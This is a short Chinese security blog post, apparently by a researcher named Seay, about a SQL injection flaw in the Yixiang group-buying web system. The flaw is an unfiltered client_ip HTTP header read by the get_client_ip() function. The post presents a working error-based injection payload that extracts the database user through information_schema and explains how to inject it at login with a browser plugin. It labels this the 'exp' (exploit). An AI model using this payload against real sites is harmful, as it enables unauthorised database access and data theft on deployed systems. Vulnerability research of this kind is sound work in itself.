最新易想团购系统通杀SQL注入漏洞分析附利用exp

作者:Seay

刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。

 

找到get_client_ip()函数。

 

果然没过滤,看了下很多地方用到这个函数。

 

比如

 

 

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

报错注入,很简单吧,

exp:

火狐插件增加client_ip

值为

‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

这套程序用的thinkphp的框架,待会看看有没有代码执行。。。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录